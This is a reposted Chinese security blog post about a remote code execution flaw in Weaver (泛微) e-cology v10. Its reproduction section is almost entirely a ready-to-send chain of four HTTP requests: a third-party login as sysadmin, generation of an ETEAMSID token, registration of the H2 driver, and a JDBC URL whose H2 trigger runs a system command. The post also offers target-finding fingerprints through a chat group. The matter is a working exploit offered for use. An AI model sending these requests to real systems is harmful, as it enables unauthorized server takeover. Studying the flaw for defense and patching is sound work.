【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

admin 2024年8月24日21:50:01评论31 views字数 1781阅读5分56秒阅读模式
【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

点击上方蓝字关注我们

【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

漏洞简介

    泛微Ecology-10.0存在远程代码执行漏洞,该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过JDBC反序列化和实现RCE,系统必须依赖于 H2 数据库。

网络测绘

获取指纹请加入星落安全交流群,入群方式在文章底部!

【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

漏洞复现

POST /papi/passport/rest/appThirdLogin HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 52username=sysadmin&service=1&ip=1&loginType=third

【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

POST /papi/passport/login/generateEteamsId HTTP/1.1Host:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 57stTicket=ST-101-evSBqSjCgdFlybBozZWR-http://127.0.0.1

【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

POST /api/bs/iaauthclient/base/save HTTP/1.1Host: Content-Length: 86User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://ipReferer: http://ip/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeETEAMSID: THIRD_def423a1574e66bbdb29bc647cd{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}

【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1Host:Content-Length: 199User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://127.0.0.1Referer: http://127.0.0.1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeETEAMSID: THIRD_7a045fd9ebc4540e9f9e6688d{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascriptnjava.lang.Runtime.getRuntime().exec("id")$$"}

【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

原文始发于微信公众号(爱喝酒烫头的曹操):【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月24日21:50:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞https://cn-sec.com/archives/3088856.html

发表评论

匿名网友 填写信息